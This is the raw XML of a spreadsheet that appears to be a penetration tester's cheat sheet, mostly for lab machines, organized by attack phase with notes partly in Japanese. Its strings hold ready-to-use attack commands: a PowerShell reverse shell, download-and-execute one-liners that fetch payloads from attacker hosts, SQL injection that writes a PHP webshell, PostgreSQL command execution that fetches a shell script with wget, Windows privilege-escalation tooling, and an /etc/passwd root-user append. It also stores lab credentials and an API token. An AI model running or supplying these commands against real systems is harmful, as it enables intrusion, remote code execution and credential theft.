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0" documentId="8_{4E90CBD6-12D7-4B86-9823-9AD7F3B62FD4}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="240" yWindow="105" windowWidth="14805" windowHeight="8010" firstSheet="11" activeTab="11" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="Readme" sheetId="17" r:id="rId1"/>
    <sheet name="Setting" sheetId="18" r:id="rId2"/>
    <sheet name="1. Reconnaissance" sheetId="6" r:id="rId3"/>
    <sheet name="2. Resource Development" sheetId="10" r:id="rId4"/>
    <sheet name="3. Initial Access" sheetId="11" r:id="rId5"/>
    <sheet name="4. Execution" sheetId="12" r:id="rId6"/>
    <sheet name="5. Persistence" sheetId="13" r:id="rId7"/>
    <sheet name="6. Privilege Escalation" sheetId="14" r:id="rId8"/>
    <sheet name="7. Defense Evasion" sheetId="15" r:id="rId9"/>
    <sheet name="8. Credential Access" sheetId="16" r:id="rId10"/>
    <sheet name="9. Discovery" sheetId="9" r:id="rId11"/>
    <sheet name="10. Lateral Movement" sheetId="21" r:id="rId12"/>
    <sheet name="100. Metasploit" sheetId="20" r:id="rId13"/>
    <sheet name="101. ExploitTools" sheetId="4" r:id="rId14"/>
    <sheet name="102. Phising Tools" sheetId="8" r:id="rId15"/>
    <sheet name="103. OriginalTools" sheetId="5" r:id="rId16"/>
    <sheet name="104. TMUX" sheetId="22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11" l="1"/>
  <c r="B47" i="6"/>
  <c r="B46" i="6"/>
  <c r="C5" i="11"/>
  <c r="B42" i="6"/>
  <c r="I4" i="21"/>
  <c r="H4" i="21"/>
  <c r="I4" i="9"/>
  <c r="H4" i="9"/>
  <c r="I4" i="16"/>
  <c r="H4" i="16"/>
  <c r="I4" i="15"/>
  <c r="H4" i="15"/>
  <c r="I4" i="14"/>
  <c r="H4" i="14"/>
  <c r="I4" i="13"/>
  <c r="H4" i="13"/>
  <c r="I4" i="12"/>
  <c r="H4" i="12"/>
  <c r="I4" i="11"/>
  <c r="H4" i="11"/>
  <c r="F5" i="21"/>
  <c r="E5" i="21"/>
  <c r="F4" i="21"/>
  <c r="E4" i="21"/>
  <c r="F5" i="9"/>
  <c r="E5" i="9"/>
  <c r="F4" i="9"/>
  <c r="B37" i="9" s="1"/>
  <c r="E4" i="9"/>
  <c r="F5" i="16"/>
  <c r="E5" i="16"/>
  <c r="F4" i="16"/>
  <c r="E4" i="16"/>
  <c r="F5" i="15"/>
  <c r="E5" i="15"/>
  <c r="F4" i="15"/>
  <c r="E4" i="15"/>
  <c r="F5" i="14"/>
  <c r="B105" i="14" s="1"/>
  <c r="E5" i="14"/>
  <c r="F4" i="14"/>
  <c r="E4" i="14"/>
  <c r="F5" i="13"/>
  <c r="E5" i="13"/>
  <c r="F4" i="13"/>
  <c r="E4" i="13"/>
  <c r="F5" i="12"/>
  <c r="E5" i="12"/>
  <c r="F4" i="12"/>
  <c r="E4" i="12"/>
  <c r="F5" i="11"/>
  <c r="E5" i="11"/>
  <c r="F4" i="11"/>
  <c r="E4" i="11"/>
  <c r="C5" i="21"/>
  <c r="B18" i="21"/>
  <c r="B34" i="6"/>
  <c r="B33" i="6"/>
  <c r="B45" i="6"/>
  <c r="B5" i="21"/>
  <c r="C5" i="9"/>
  <c r="B13" i="9" s="1"/>
  <c r="B5" i="9"/>
  <c r="C5" i="16"/>
  <c r="B5" i="16"/>
  <c r="C5" i="15"/>
  <c r="B5" i="15"/>
  <c r="C5" i="14"/>
  <c r="B5" i="14"/>
  <c r="B5" i="13"/>
  <c r="C5" i="13"/>
  <c r="C5" i="12"/>
  <c r="B101" i="12" s="1"/>
  <c r="B5" i="12"/>
  <c r="B4" i="11"/>
  <c r="B5" i="11"/>
  <c r="B17" i="12"/>
  <c r="B13" i="12"/>
  <c r="B14" i="12"/>
  <c r="B12" i="12"/>
  <c r="B55" i="12"/>
  <c r="C4" i="15"/>
  <c r="B50" i="11"/>
  <c r="C4" i="12"/>
  <c r="B16" i="12"/>
  <c r="B28" i="12"/>
  <c r="B24" i="12"/>
  <c r="B23" i="12"/>
  <c r="B15" i="12"/>
  <c r="C4" i="9"/>
  <c r="C4" i="21"/>
  <c r="C4" i="4"/>
  <c r="B22" i="5"/>
  <c r="C4" i="5"/>
  <c r="B34" i="13"/>
  <c r="B30" i="13"/>
  <c r="C4" i="13"/>
  <c r="B44" i="13" s="1"/>
  <c r="C4" i="11"/>
  <c r="B34" i="11" s="1"/>
  <c r="C4" i="16"/>
  <c r="B13" i="14"/>
  <c r="C4" i="14"/>
  <c r="B15" i="14" s="1"/>
  <c r="B39" i="8"/>
  <c r="C4" i="8"/>
  <c r="B31" i="8" s="1"/>
  <c r="B13" i="6"/>
  <c r="B10" i="21" l="1"/>
  <c r="B48" i="11"/>
  <c r="B49" i="11"/>
  <c r="B10" i="16"/>
  <c r="E8" i="13"/>
  <c r="B8" i="13"/>
  <c r="B93" i="14"/>
  <c r="B102" i="14"/>
  <c r="B101" i="14"/>
  <c r="B100" i="14"/>
  <c r="B98" i="14"/>
  <c r="B99" i="14"/>
  <c r="B97" i="14"/>
  <c r="B67" i="4"/>
  <c r="B66" i="4"/>
  <c r="B66" i="12"/>
  <c r="B68" i="12"/>
  <c r="B11" i="21"/>
  <c r="B9" i="21"/>
  <c r="B68" i="16"/>
  <c r="B67" i="16"/>
  <c r="B21" i="14"/>
  <c r="B67" i="12"/>
  <c r="B16" i="11"/>
  <c r="B33" i="11"/>
  <c r="C37" i="20"/>
  <c r="C36" i="20"/>
  <c r="C35" i="20"/>
  <c r="C34" i="20"/>
  <c r="B24" i="10"/>
  <c r="B62" i="16"/>
  <c r="B63" i="16"/>
  <c r="C31" i="20"/>
  <c r="C30" i="20"/>
  <c r="B40" i="21"/>
  <c r="B54" i="12"/>
  <c r="B57" i="12"/>
  <c r="B63" i="12"/>
  <c r="B64" i="12"/>
  <c r="B15" i="11"/>
  <c r="B37" i="11"/>
  <c r="B14" i="13"/>
  <c r="B65" i="13"/>
  <c r="B41" i="11"/>
  <c r="B40" i="11"/>
  <c r="B39" i="11"/>
  <c r="B38" i="11"/>
  <c r="B36" i="11"/>
  <c r="B35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C29" i="20"/>
  <c r="C28" i="20"/>
  <c r="B14" i="11"/>
  <c r="B17" i="21"/>
  <c r="B16" i="21"/>
  <c r="B55" i="13"/>
  <c r="B33" i="13"/>
  <c r="B32" i="13"/>
  <c r="B31" i="13"/>
  <c r="B20" i="11"/>
  <c r="B13" i="11"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="622" uniqueCount="564">
  <si>
    <t>I take a short break. I'll be back in about 15 minutes.</t>
  </si>
  <si>
    <t>I take a long break. I'll be back in about 90 minutes.</t>
  </si>
  <si>
    <t>I take a long break. I'll be back in about 240 minutes.</t>
  </si>
  <si>
    <t>最初のユーザシェル取得までによく使うコードです</t>
  </si>
  <si>
    <t>IP (local)</t>
  </si>
  <si>
    <t>10.10.16.4</t>
  </si>
  <si>
    <t>username</t>
  </si>
  <si>
    <t>Tiffany.Molina</t>
  </si>
  <si>
    <t>password</t>
  </si>
  <si>
    <t>'NewIntelligenceCorpUser9876'</t>
  </si>
  <si>
    <t>IP(target)</t>
  </si>
  <si>
    <t>10.10.10.248</t>
  </si>
  <si>
    <t>domain</t>
  </si>
  <si>
    <t>intelligence.htb</t>
  </si>
  <si>
    <t>偵察</t>
  </si>
  <si>
    <t>sudo autorecon -t servers.txt</t>
  </si>
  <si>
    <t>sudo autorecon 192.168.xx.xx</t>
  </si>
  <si>
    <t>nmap -sC -sV -Pn -iL servers.txt</t>
  </si>
  <si>
    <t>gobuster dir -u 192.168.xx.xx -w /usr/share/wordlists/dirb/common.txt -t 80　-k</t>
  </si>
  <si>
    <t>★証明書回避は-kをつける</t>
  </si>
  <si>
    <t>wpscan --url http://192.168.196.244 --enumerate p --plugins-detection aggressive -o wpscan.txt</t>
  </si>
  <si>
    <t>wpscan --url http://192.168.204.244 --api-token 3dspMLTT7Oy5F3pLK9UxHMJJKvRh4NLoHpkgGCM4T5w --enumerate p --plugins-detection aggressive</t>
  </si>
  <si>
    <t>dirsearch -u http://cozyhosting.htb/</t>
  </si>
  <si>
    <t>snmpwalk</t>
  </si>
  <si>
    <t>snmpwalk -v 1 -c public 192.168.188.149</t>
  </si>
  <si>
    <t xml:space="preserve">snmpwalk -v 1 -c public 192.168.188.149 1.3.6.1.2.1.4.34.1.3 </t>
  </si>
  <si>
    <t xml:space="preserve">snmpwalk -v 1 -c public 192.168.188.149 NET-SNMP-EXTEND-MIB::nsExtendObjects </t>
  </si>
  <si>
    <t>サニタイズチェック</t>
  </si>
  <si>
    <t>&lt; &gt; ' " { } ; &amp; -- /* */ \ %</t>
  </si>
  <si>
    <t>CMD/PowerShellの識別</t>
  </si>
  <si>
    <t>(dir 2&gt;&amp;1 *`|echo CMD);&amp;&lt;# rem #&gt;echo PowerShell</t>
  </si>
  <si>
    <t>vhost</t>
  </si>
  <si>
    <t xml:space="preserve">gobuster vhost -u http://topology.htb --append-domain -w test.txt
</t>
  </si>
  <si>
    <t>LDAP</t>
  </si>
  <si>
    <t>windapsearch.py -u "FABRICORP\bnielson" --dc-ip 10.10.10.193 -U --attrs cn,memberof</t>
  </si>
  <si>
    <t>★old version. need to update</t>
  </si>
  <si>
    <t>windapsearch.py -u "FABRICORP\bnielson" --dc-ip 10.10.10.193 -G --attrs cn,memberof</t>
  </si>
  <si>
    <t>Build Wordlist</t>
  </si>
  <si>
    <t>cewl http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers &gt; wordlist</t>
  </si>
  <si>
    <t>RID Bruteforce</t>
  </si>
  <si>
    <t>kbrute</t>
  </si>
  <si>
    <t>★/etc/resolve.confの一番下に書く。速度低下防止の為。</t>
  </si>
  <si>
    <t>kerbrute passwordspray userlist NewIntelligenceCorpUser9876 --dc 10.10.10.248 -d</t>
  </si>
  <si>
    <t>Powershell One Liner</t>
  </si>
  <si>
    <t>dpcument 9.3.1</t>
  </si>
  <si>
    <t>$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2&gt;&amp;1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '&gt; ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()</t>
  </si>
  <si>
    <t>https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3</t>
  </si>
  <si>
    <t>busybox</t>
  </si>
  <si>
    <t>LatelalMovementでよく使う攻撃コードです</t>
  </si>
  <si>
    <t>データ送受信用のサーバ起動</t>
  </si>
  <si>
    <t>python3 -m http.server 80</t>
  </si>
  <si>
    <t>wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root webdav</t>
  </si>
  <si>
    <t>impacket-smbserver -smb2support share . -username kali -password kali</t>
  </si>
  <si>
    <t>データのダウンロード</t>
  </si>
  <si>
    <t>FileZilla</t>
  </si>
  <si>
    <t>攻撃ツールのアップロード</t>
  </si>
  <si>
    <t>./dirty_pipe_2 /usr/bin/sudo</t>
  </si>
  <si>
    <t>Send Mail</t>
  </si>
  <si>
    <t>sudo swaks -t dave.wizard@supermagicorg.com --from test@supermagicorg.com -ap --attach config.Library-ms --server 192.168.189.199 --body body.txt --header "Subject: Problems" --suppress-data</t>
  </si>
  <si>
    <t>user  test@supermagicorg.com pass test</t>
  </si>
  <si>
    <t>SMB</t>
  </si>
  <si>
    <t>recurse ON</t>
  </si>
  <si>
    <t>prompt OFF</t>
  </si>
  <si>
    <t>mget *</t>
  </si>
  <si>
    <t>SMB  mount</t>
  </si>
  <si>
    <t>mkdir /mnt/share</t>
  </si>
  <si>
    <t xml:space="preserve">sudo mount -t cifs //10.10.10.134/Backups /mnt/share     </t>
  </si>
  <si>
    <t>NFS  mount</t>
  </si>
  <si>
    <t>showmount -e &lt;IP&gt;</t>
  </si>
  <si>
    <t>sudo mount -t nfs 10.12.0.150:/backup /mnt/new_back</t>
  </si>
  <si>
    <t>sudo mount -t nfs -o vers=2 10.12.0.150:/backup /mnt/new_back</t>
  </si>
  <si>
    <t>MSSQL</t>
  </si>
  <si>
    <t>impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth</t>
  </si>
  <si>
    <t>impacket-mssqlclient -p 1433 -windows-auth -dc-ip 10.10.11.236 "manager.htb/Operator:&lt;password&gt;"@10.10.11.236</t>
  </si>
  <si>
    <t>EXECUTE sp_configure 'show advanced options', 1;</t>
  </si>
  <si>
    <t>RECONFIGURE;</t>
  </si>
  <si>
    <t>EXECUTE sp_configure 'xp_cmdshell', 1;</t>
  </si>
  <si>
    <t>CMDからPowershellを起動する</t>
  </si>
  <si>
    <t>powershell -Command "ls"</t>
  </si>
  <si>
    <t>Dummy Link</t>
  </si>
  <si>
    <t>https://placekitten.com/300/300</t>
  </si>
  <si>
    <t>git-dumper</t>
  </si>
  <si>
    <t xml:space="preserve">git-dumper http://pilgrimage.htb/.git website  </t>
  </si>
  <si>
    <t>VPN IPSEC</t>
  </si>
  <si>
    <t>strongswan</t>
  </si>
  <si>
    <t>https://blog.ruanbekker.com/blog/2018/02/11/setup-a-site-to-site-ipsec-vpn-with-strongswan-and-preshared-key-authentication/</t>
  </si>
  <si>
    <t>edit /etc/ipsec.secrets</t>
  </si>
  <si>
    <t>edit /etc/ipsec.conf</t>
  </si>
  <si>
    <t xml:space="preserve">sudo ipsec restart </t>
  </si>
  <si>
    <t xml:space="preserve">sudo ipsec up XXXX </t>
  </si>
  <si>
    <t>DNSTOOL</t>
  </si>
  <si>
    <t>MSSQL Exploit</t>
  </si>
  <si>
    <t>';EXECUTE sp_configure 'show advanced options', 1;</t>
  </si>
  <si>
    <t>';RECONFIGURE;</t>
  </si>
  <si>
    <t>';EXECUTE sp_configure 'xp_cmdshell', 1;</t>
  </si>
  <si>
    <t>MSSQL 起動</t>
  </si>
  <si>
    <t>sqlcmd -S server_name -U username -P password</t>
  </si>
  <si>
    <t>MYSQL Exploit</t>
  </si>
  <si>
    <t>' UNION SELECT null,null,null,null, "&lt;?php system($_GET['cmd']);?&gt;",null INTO OUTFILE "/var/www/html/webshell.php"-- //"</t>
  </si>
  <si>
    <t>' union select null, table_name, column_name, table_schema, null from information_schema.columns where table_schema=database() -- //</t>
  </si>
  <si>
    <t>; SELECT 1=cast(version() as int) --</t>
  </si>
  <si>
    <t>MYSQL　起動</t>
  </si>
  <si>
    <t>mysql -u oscuser -pPASSWORD</t>
  </si>
  <si>
    <t>★-pの後ろにスペースはいれない！！！</t>
  </si>
  <si>
    <t>SHOW DATABASES;</t>
  </si>
  <si>
    <t>USE database_name;</t>
  </si>
  <si>
    <t>SHOW TABLES;</t>
  </si>
  <si>
    <t>DESCRIBE table_name;</t>
  </si>
  <si>
    <t>UPDATE administrators SET user_password = '$P$BrVo.kFwGCirdyyQ0ujuxOtmIBIjR6/' WHERE user_name = 'admin';</t>
  </si>
  <si>
    <t>PostgreSQL　Exploit</t>
  </si>
  <si>
    <t xml:space="preserve">DROP TABLE IF EXISTS cmd_exec; -- </t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE cmd_exec(cmd_output text); -- </t>
  </si>
  <si>
    <t xml:space="preserve">COPY cmd_exec FROM PROGRAM 'wget 192.168.45.236/busybox.sh -O /tmp/shell.sh'; -- </t>
  </si>
  <si>
    <t xml:space="preserve">COPY cmd_exec FROM PROGRAM 'bash /tmp/shell.sh'; -- </t>
  </si>
  <si>
    <t>SELECT * FROM cmd_exec;</t>
  </si>
  <si>
    <t>PostgreSQL　起動</t>
  </si>
  <si>
    <t>psql -h localhost -p 5432 -U postgres -d webapp</t>
  </si>
  <si>
    <t>PostgreSQL　ユーザ追加</t>
  </si>
  <si>
    <t>sudo -u postgres psql</t>
  </si>
  <si>
    <t>CREATE ROLE root LOGIN;</t>
  </si>
  <si>
    <t>\password root</t>
  </si>
  <si>
    <t>Execute from Linux</t>
  </si>
  <si>
    <t>wget 192.168.45.244/original/reverse_shell_python.py -O /tmp/shell.sh;chmod 755 /tmp/shell.sh;/tmp/shell.sh</t>
  </si>
  <si>
    <t xml:space="preserve">Base64 </t>
  </si>
  <si>
    <t>echo${IFS}"[ PAYLOAD ]"|base64${IFS}-d|bash;</t>
  </si>
  <si>
    <t>Execute from Windows</t>
  </si>
  <si>
    <t>powershell.exe -c IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.16.7/original/reverse_shell_oneline.ps1')</t>
  </si>
  <si>
    <t>Execute from Windows Security Bypass</t>
  </si>
  <si>
    <t>IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.16.2/PowerUp.ps1')</t>
  </si>
  <si>
    <t>XSS</t>
  </si>
  <si>
    <t>&lt;iframe width="100%" height="166" scrolling="no" frameborder="no" allow="autoplay" src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/771984076&amp;color=%23ff5500&amp;auto_play=true&amp;hide_related=false&amp;show_comments=true&amp;show_user=true&amp;show_reposts=false&amp;show_teaser=true"&gt;&lt;/iframe&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;iframe src="javascript:alert(`xss`)"&gt;</t>
  </si>
  <si>
    <t>XXE</t>
  </si>
  <si>
    <t>&lt;?xml version="1.0"?&gt;
&lt;!DOCTYPE xxe [
&lt;!ELEMENT xxe ANY &gt;
&lt;!ENTITY xxe SYSTEM "file:///c:/Windows/system.ini" &gt;]&gt;&lt;xxe&gt;&amp;xxe;&lt;/xxe&gt;</t>
  </si>
  <si>
    <t>Null Byte Injection</t>
  </si>
  <si>
    <t>/ftp/eastere.gg%2500.md</t>
  </si>
  <si>
    <t>Oracle DB</t>
  </si>
  <si>
    <t xml:space="preserve">python3 odat.py all -s 10.10.10.82 -p 1521 -d XE  </t>
  </si>
  <si>
    <t>python3 odat.py utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --putFile c:/ met.exe met.exe</t>
  </si>
  <si>
    <t>python3 odat.py externaltable -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --exec c:/ met.exe</t>
  </si>
  <si>
    <t>PHP RCE</t>
  </si>
  <si>
    <t>&lt;?php system($_GET["cmd"]);?&gt;</t>
  </si>
  <si>
    <t>echo '&lt;?php system($_GET["cmd"]);?&gt;' &gt; test.php</t>
  </si>
  <si>
    <t>RPC</t>
  </si>
  <si>
    <t>querydispinfo</t>
  </si>
  <si>
    <t>enumprinters</t>
  </si>
  <si>
    <t>SSH Port Forwarding</t>
  </si>
  <si>
    <t>Ligolo-NG</t>
  </si>
  <si>
    <t xml:space="preserve">sudo ip tuntap add user kali mode tun ligolo            </t>
  </si>
  <si>
    <t>sudo ip link set ligolo up</t>
  </si>
  <si>
    <t xml:space="preserve">./ligolo_proxy -selfcert     </t>
  </si>
  <si>
    <t>session</t>
  </si>
  <si>
    <t>ifconfig</t>
  </si>
  <si>
    <t>sudo ip route add 10.10.135.0/24 dev ligolo</t>
  </si>
  <si>
    <t>start</t>
  </si>
  <si>
    <t>ip route list</t>
  </si>
  <si>
    <t>crackmapexec smb 10.10.135.0/24</t>
  </si>
  <si>
    <t>listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:443</t>
  </si>
  <si>
    <t>listener_add --addr 0.0.0.0:1235 --to 127.0.0.1:80</t>
  </si>
  <si>
    <t>listener_list l</t>
  </si>
  <si>
    <t>sudo ip route del 10.11.0.0/16 via 192.168.45.254 dev tun0</t>
  </si>
  <si>
    <t>Chisel</t>
  </si>
  <si>
    <t>Local Adminの作成</t>
  </si>
  <si>
    <t>net user john Password123! /add</t>
  </si>
  <si>
    <t>net localgroup administrators john /add</t>
  </si>
  <si>
    <t>Admin Passwordの変更</t>
  </si>
  <si>
    <t>$passwd = ConvertTo-SecureString 'Password123!' -AsPlainText -Force;</t>
  </si>
  <si>
    <t>$creds = New-Object System.Management.Automation.PSCredential('administrator', $passwd)</t>
  </si>
  <si>
    <t>シェルの構成</t>
  </si>
  <si>
    <t>python3 -c 'import pty; pty.spawn("/bin/bash")'</t>
  </si>
  <si>
    <t>proxychains XX</t>
  </si>
  <si>
    <t>ssh -N -L 0.0.0.0:4455:172.16.50.217:445 database_admin@10.4.50.215</t>
  </si>
  <si>
    <t>ssh -N -D 0.0.0.0:9999 database_admin@10.4.50.215</t>
  </si>
  <si>
    <t>socks5 192.168.50.63 9999</t>
  </si>
  <si>
    <t>ssh -N -R 127.0.0.1:2345:10.4.50.215:5432 kali@192.168.118.4</t>
  </si>
  <si>
    <t>ssh -N -R 9998 kali@192.168.118.4</t>
  </si>
  <si>
    <t>socks5 127.0.0.1 9998</t>
  </si>
  <si>
    <t>xfreerdp /u:rdp_admin /p:P@ssw0rd! /v:127.0.0.1:9833</t>
  </si>
  <si>
    <t>netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.222.64 connectport=22 connectaddress=10.4.222.215</t>
  </si>
  <si>
    <t>netsh interface portproxy show all</t>
  </si>
  <si>
    <t>netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.222.64 localport=2222 action=allow</t>
  </si>
  <si>
    <t>SSH接続設定</t>
  </si>
  <si>
    <t>cat /etc/ssh/sshd_config |grep -i PubkeyAuthentication</t>
  </si>
  <si>
    <t>ssh-keygen -t rsa -f id_rsa</t>
  </si>
  <si>
    <t>echo "cat id_rsa.pub &gt;&gt; authorized_keys"</t>
  </si>
  <si>
    <t>chmod 600 authorized_keys</t>
  </si>
  <si>
    <t>Change Password</t>
  </si>
  <si>
    <t>rpcclient</t>
  </si>
  <si>
    <t>PowerUpでの一括検索</t>
  </si>
  <si>
    <t>. .\PowerUp.ps1</t>
  </si>
  <si>
    <t>Invoke-AllChecks</t>
  </si>
  <si>
    <t>Invoke-ServiceAbuse -Name [サービス名]</t>
  </si>
  <si>
    <t>SeImpersonatePrivilege</t>
  </si>
  <si>
    <t>.\GodPotato-NET4.exe -cmd "cmd /c whoami"</t>
  </si>
  <si>
    <t>.\JuicyPotato.exe -t * -p C:\Users\Public\Documents\change_admin_password.bat -l 9001 -c "{A9B5F443-FE02-4C19-859D-E9B5C5A1B6C6}"</t>
  </si>
  <si>
    <t>change_admin_password.bat</t>
  </si>
  <si>
    <t>net user Administrator Password123!</t>
  </si>
  <si>
    <t>CLSID</t>
  </si>
  <si>
    <t>juicy-potato/CLSID at master · ohpe/juicy-potato · GitHub</t>
  </si>
  <si>
    <t>FullPowers</t>
  </si>
  <si>
    <t>Service Binary Hijacking</t>
  </si>
  <si>
    <t>powershell -ep bypass</t>
  </si>
  <si>
    <t>Get-ModifiableServiceFile</t>
  </si>
  <si>
    <t>Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}</t>
  </si>
  <si>
    <t>icacls "C:\xampp\apache\bin\httpd.exe"</t>
  </si>
  <si>
    <t>net stop xx</t>
  </si>
  <si>
    <t>net start xx</t>
  </si>
  <si>
    <t>ls</t>
  </si>
  <si>
    <t>shutdown /r /t 0</t>
  </si>
  <si>
    <t>sc.exe create "Scheduler" binpath= "C:\Users\support\admintool.exe"</t>
  </si>
  <si>
    <t>Service DLL Hijacking</t>
  </si>
  <si>
    <t>icacls .\Documents\BetaServ.exe</t>
  </si>
  <si>
    <t>Procmon64.exe</t>
  </si>
  <si>
    <t>Get-Service | Where-Object { $_.Name -like '*Skylark*' }</t>
  </si>
  <si>
    <t>Restart-Service BetaService</t>
  </si>
  <si>
    <t>$env:path</t>
  </si>
  <si>
    <t>Get-Service</t>
  </si>
  <si>
    <t xml:space="preserve"> Get-Service | Where-Object { $_.DisplayName -like "*Enterprise*" }</t>
  </si>
  <si>
    <t>Unquoted Service Paths</t>
  </si>
  <si>
    <t>Get-CimInstance -ClassName win32_service | Select Name,State,PathName</t>
  </si>
  <si>
    <t>wmic service get name,pathname |  findstr /i /v "C:\Windows\\" | findstr /i /v """</t>
  </si>
  <si>
    <t>Start-Service GammaService</t>
  </si>
  <si>
    <t>Stop-Service GammaService</t>
  </si>
  <si>
    <t>icacls "C:\Program Files\Enterprise Apps"</t>
  </si>
  <si>
    <t>Get-UnquotedService</t>
  </si>
  <si>
    <t>Write-ServiceBinary -Name 'GammaService' -Path "C:\Program Files\Enterprise Apps\Current.exe"</t>
  </si>
  <si>
    <t>Scheduled Tasks</t>
  </si>
  <si>
    <t>schtasks /query /fo LIST /v</t>
  </si>
  <si>
    <t>Get-ScheduledTask</t>
  </si>
  <si>
    <t>schtasks /query /fo LIST /v | ForEach-Object {if ($_ -match "TaskName:") {$taskName = $_} elseif ($_ -match "Next Run Time:") {$nextRunTime = $_}; if ($taskName -and $nextRunTime) {if ($nextRunTime -notmatch "N/A") {$taskName; $nextRunTime}; $taskName = $nextRunTime = $null}}</t>
  </si>
  <si>
    <t>PuTTY</t>
  </si>
  <si>
    <t xml:space="preserve">reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" </t>
  </si>
  <si>
    <t>Powershellの履歴</t>
  </si>
  <si>
    <t>Get-History</t>
  </si>
  <si>
    <t>type (Get-PSReadlineOption).HistorySavePath</t>
  </si>
  <si>
    <t>Privilege Escalation -WIndows</t>
  </si>
  <si>
    <t>whoami /groups</t>
  </si>
  <si>
    <t>Get-LocalUser</t>
  </si>
  <si>
    <t>Get-LocalGroup</t>
  </si>
  <si>
    <t>Get-LocalGroupMember adminteam</t>
  </si>
  <si>
    <t>route print</t>
  </si>
  <si>
    <t>netstat -ano</t>
  </si>
  <si>
    <t>Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname</t>
  </si>
  <si>
    <t>Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname</t>
  </si>
  <si>
    <t>Get-Process</t>
  </si>
  <si>
    <t>Get-Service nscp | fl *</t>
  </si>
  <si>
    <t>ファイル探索</t>
  </si>
  <si>
    <t>Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue</t>
  </si>
  <si>
    <t>Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue</t>
  </si>
  <si>
    <t>Get-ChildItem -Path C:\Users\dave\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue</t>
  </si>
  <si>
    <t>icacls C:\Users\steve\Pictures\BackendCacheCleanup.exe</t>
  </si>
  <si>
    <t>RPCCLIENT</t>
  </si>
  <si>
    <t xml:space="preserve">rpcclient </t>
  </si>
  <si>
    <t>enumerationとかのコマンドを討つ</t>
  </si>
  <si>
    <t>Printer</t>
  </si>
  <si>
    <t>AD CS Domain Escalation</t>
  </si>
  <si>
    <t>Certify.exe find /vulnerable</t>
  </si>
  <si>
    <t>NTPDATE 時刻同期</t>
  </si>
  <si>
    <t>while [ 1 ]; do sudo ntpdate 10.10.10.248;done</t>
  </si>
  <si>
    <t>権限昇格-Linux</t>
  </si>
  <si>
    <t>構成把握</t>
  </si>
  <si>
    <t>id</t>
  </si>
  <si>
    <t>cat /etc/passwd</t>
  </si>
  <si>
    <t>cat /etc/issue</t>
  </si>
  <si>
    <t>cat /etc/crontab</t>
  </si>
  <si>
    <t>uname -a</t>
  </si>
  <si>
    <t>routel</t>
  </si>
  <si>
    <t>netstat -anp</t>
  </si>
  <si>
    <t>ip a</t>
  </si>
  <si>
    <t>cat /etc/iptables/rules.v4</t>
  </si>
  <si>
    <t>ls -lah /etc/cron*</t>
  </si>
  <si>
    <t>crontab -l</t>
  </si>
  <si>
    <t>sudo crontab -l</t>
  </si>
  <si>
    <t>dpkg -l</t>
  </si>
  <si>
    <t>find / -writable -type d 2&gt;/dev/null</t>
  </si>
  <si>
    <t>cat /etc/fstab</t>
  </si>
  <si>
    <t xml:space="preserve">cat /etc/fstab </t>
  </si>
  <si>
    <t>mount</t>
  </si>
  <si>
    <t>lsblk</t>
  </si>
  <si>
    <t>lsmod</t>
  </si>
  <si>
    <t>/sbin/modinfo libata</t>
  </si>
  <si>
    <t>find / -perm -u=s -type f 2&gt;/dev/null</t>
  </si>
  <si>
    <t>./unix-privesc-check standard &gt; output.txt</t>
  </si>
  <si>
    <t>watch -n 1 "ps -aux | grep pass"</t>
  </si>
  <si>
    <t>sudo tcpdump -i lo -A | grep "pass"</t>
  </si>
  <si>
    <t>grep "CRON" /var/log/syslog</t>
  </si>
  <si>
    <t>/usr/sbin/getcap -r / 2&gt;/dev/null</t>
  </si>
  <si>
    <t>perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'</t>
  </si>
  <si>
    <t>find /home/joe/Desktop -exec "/usr/bin/bash" -p \;</t>
  </si>
  <si>
    <t>sudo -l</t>
  </si>
  <si>
    <t>uname -r</t>
  </si>
  <si>
    <t>arch</t>
  </si>
  <si>
    <t>ps aux|grep opt</t>
  </si>
  <si>
    <t>pwnkit</t>
  </si>
  <si>
    <t>Change /etc/passwd</t>
  </si>
  <si>
    <t>openssl passwd w00t</t>
  </si>
  <si>
    <t>echo "root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash" &gt;&gt; /etc/passwd</t>
  </si>
  <si>
